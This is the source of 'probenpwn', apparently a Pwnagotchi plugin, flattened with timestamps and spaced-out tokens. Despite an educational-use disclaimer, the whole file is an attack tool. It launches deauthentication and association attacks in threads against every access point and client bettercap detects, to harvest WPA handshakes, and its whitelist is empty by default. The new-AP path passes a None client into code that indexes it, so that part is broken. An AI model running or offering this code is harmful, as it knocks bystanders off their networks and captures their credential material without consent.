2025-02-02 17:29:54 -08:00
"""
DISCLAIMER : This software is provided for educational and research purposes only .
Use of this plugin on networks or devices that you do not own or have explicit permission
to test is strictly prohibited . The author ( s ) and contributors are not responsible for any
misuse , damages , or legal consequences that may result from unauthorized or improper usage .
By using this plugin , you agree to assume all risks and take full responsibility for ensuring
that all applicable laws and regulations are followed .
"""
2025-02-02 17:15:19 -08:00
import logging
import time
import threading
import pwnagotchi . plugins as plugins
class probenpwn ( plugins . Plugin ) :
__author__ = ' AlienMajik '
__version__ = ' 1.0.0 '
__license__ = ' GPL3 '
__description__ = ' Pwn more aggressively. Launch immediate associate or deauth attack when bettercap spots a device, with enhanced performance for more handshakes. '
def __init__ ( self ) :
logging . debug ( " ProbeNpwn plugin created " )
self . _agent = None
self . old_name = None
self . recents = { }
self . whitelist = set ( )
self . attack_threads = [ ]
self . epoch_duration = 60 # Define a default epoch duration (seconds)
# called before the plugin is unloaded
def on_unload ( self , ui ) :
if self . old_name :
ui . set ( ' name ' , " %s " % self . old_name )
else :
ui . set ( ' name ' , " %s > " % ui . get ( ' name ' ) [ : - 3 ] )
self . old_name = None
logging . info ( " probing out. " )
# called to setup the UI elements
def on_ui_setup ( self , ui ) :
self . _ui = ui
def on_ui_update ( self , ui ) :
if self . old_name is None :
self . old_name = ui . get ( ' name ' )
if self . old_name :
i = self . old_name . find ( ' > ' )
if i :
ui . set ( ' name ' , " %s %s " % ( self . old_name [ : i ] , " !!! " ) )
# called when everything is ready and the main loop is about to start
def on_ready ( self , agent ) :
self . _agent = agent
logging . info ( " Probed and Pwnd! " )
agent . run ( " wifi.clear " )
if self . _ui :
self . _ui . set ( " status " , " Probing! \n PWNING THEM GUTS! " )
def track_recent ( self , ap , cl = None ) :
ap [ ' _track_time ' ] = time . time ( )
self . recents [ ap [ ' mac ' ] . lower ( ) ] = ap
if cl :
cl [ ' _track_time ' ] = ap [ ' _track_time ' ]
self . recents [ cl [ ' mac ' ] . lower ( ) ] = cl
def ok_to_attack ( self , ap ) :
if not self . _agent :
return False
if ap [ ' hostname ' ] . lower ( ) in self . whitelist or ap [ ' mac ' ] . lower ( ) in self . whitelist :
return False
return True
def attack_target ( self , agent , ap , cl ) :
if not self . ok_to_attack ( ap ) :
return
logging . debug ( f " Launching attack on AP { ap [ ' mac ' ] } and client { cl [ ' mac ' ] } " )
# Perform deauth attack
agent . deauth ( ap , cl , self . dynamic_attack_delay ( ap , cl ) )
# Perform associate attack
agent . associate ( ap , 0.2 )
def dynamic_attack_delay ( self , ap , cl ) :
# Adjust attack delay based on client signal strength or network type
if cl . get ( ' signal ' , - 100 ) < - 60 :
return 0.5 # Longer delay for weak signals
else :
return 0.25 # Faster attack for stronger signals
def on_bcap_wifi_ap_new ( self , agent , event ) :
try :
ap = event [ ' data ' ]
if agent . _config [ ' personality ' ] [ ' associate ' ] and self . ok_to_attack ( ap ) :
logging . debug ( " insta-associate: %s ( %s ) " % ( ap [ ' hostname ' ] , ap [ ' mac ' ] ) )
# Start a thread to handle the attack
attack_thread = threading . Thread ( target = self . attack_target , args = ( agent , ap , None ) )
attack_thread . start ( )
self . attack_threads . append ( attack_thread )
except Exception as e :
logging . error ( f " Error in on_bcap_wifi_ap_new: { repr ( e ) } " )
def on_bcap_wifi_client_new ( self , agent , event ) :
try :
ap = event [ ' data ' ] [ ' AP ' ]
cl = event [ ' data ' ] [ ' Client ' ]
if agent . _config [ ' personality ' ] [ ' deauth ' ] and self . ok_to_attack ( ap ) and self . ok_to_attack ( cl ) :
logging . debug ( " insta-deauth: %s ( %s )-> ' %s ' ( %s )( %s ) " % ( ap [ ' hostname ' ] , ap [ ' mac ' ] ,
cl [ ' hostname ' ] , cl [ ' mac ' ] , cl [ ' vendor ' ] ) )
# Start a thread for each deauth attack
attack_thread = threading . Thread ( target = self . attack_target , args = ( agent , ap , cl ) )
attack_thread . start ( )
self . attack_threads . append ( attack_thread )
except Exception as e :
logging . error ( f " Error in on_bcap_wifi_client_new: { repr ( e ) } " )
def on_handshake ( self , agent , filename , ap , cl ) :
logging . info ( f " Handshake detected from { ap [ ' mac ' ] } " )
if ' mac ' in ap and ' mac ' in cl :
amac = ap [ ' mac ' ] . lower ( )
cmac = cl [ ' mac ' ] . lower ( )
if amac in self . recents :
logging . info ( f " Captured handshake from { ap [ ' hostname ' ] } ( { ap [ ' mac ' ] } ) -> ' { cl [ ' hostname ' ] } ' ( { cl [ ' mac ' ] } ) ( { cl [ ' vendor ' ] } ) " )
del self . recents [ amac ]
if cmac in self . recents :
del self . recents [ cmac ]
def on_epoch ( self , agent , epoch , epoch_data ) :
for mac in list ( self . recents ) :
if self . recents [ mac ] [ ' _track_time ' ] < ( time . time ( ) - ( self . epoch_duration * 2 ) ) :
del self . recents [ mac ]
def on_bcap_wifi_ap_updated ( self , agent , event ) :
try :
ap = event [ ' data ' ]
if self . ok_to_attack ( ap ) :
logging . debug ( f " AP updated: { ap [ ' hostname ' ] } ( { ap [ ' mac ' ] } ) " )
self . track_recent ( ap )
except Exception as e :
logging . error ( f " Error in on_bcap_wifi_ap_updated: { repr ( e ) } " )
def on_bcap_wifi_client_updated ( self , agent , event ) :
try :
ap = event [ ' data ' ] [ ' AP ' ]
cl = event [ ' data ' ] [ ' Client ' ]
if self . ok_to_attack ( ap ) and self . ok_to_attack ( cl ) :
logging . debug ( f " Client updated: { ap [ ' hostname ' ] } ( { ap [ ' mac ' ] } ) -> ' { cl [ ' hostname ' ] } ' ( { cl [ ' mac ' ] } ) ( { cl [ ' vendor ' ] } ) " )
self . track_recent ( ap , cl )
except Exception as e :
logging . error ( f " Error in on_bcap_wifi_client_updated: { repr ( e ) } " )